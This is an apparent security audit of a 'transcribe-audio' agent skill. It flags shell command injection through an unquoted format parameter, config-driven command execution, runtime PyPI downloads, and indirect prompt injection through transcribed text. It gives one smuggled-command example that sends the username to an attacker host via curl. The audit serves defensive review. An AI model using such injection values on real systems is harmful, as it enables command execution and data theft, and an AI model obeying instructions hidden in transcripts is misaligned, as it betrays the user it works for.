transcribe-audio

Warn

Audited by Gen Agent Trust Hub on Jun 16, 2026

Risk Level: MEDIUM
Categories: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION

Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/transcribe.py executes shell commands using subprocess.run(cmd, shell=True). While the script attempts to sanitize inputs using shlex.quote() for the input path and output directory, the format variable is interpolated into the command string without any quoting or validation. This allows an attacker or a malicious configuration to inject arbitrary shell commands through the format parameter (e.g., providing a format like txt; curl http://attacker.com/$(whoami)).
  • [REMOTE_CODE_EXECUTION]: The skill's operation model involves reading a shell command template from a local JSON configuration file (~/.config/transcribe-audio/config.json) and executing it. This design pattern grants the skill the ability to execute arbitrary commands defined in the configuration, which could be exploited if the configuration file is tampered with.
  • [EXTERNAL_DOWNLOADS]: The setup instructions in references/setup.md recommend using uvx to run transcription models such as mlx-whisper, parakeet-mlx, and whisper-ctranslate2. These commands download and execute code from the Python Package Index (PyPI) at runtime. While these are established tools in the machine learning community, the process involves executing code from an external repository.
  • [PROMPT_INJECTION]: The skill processes transcribed text, which may contain indirect prompt injections designed to influence the agent during the 'error fixing' or 'structuring' phases. The skill includes some mitigation by instructing the agent to flag issues for human review rather than performing silent corrections, which reduces but does not eliminate the risk.

Audit Metadata
Risk Level: MEDIUM
Analyzed: Jun 16, 2026, 06:20 PM
Security Audit — agent-trust-hub — transcribe-audio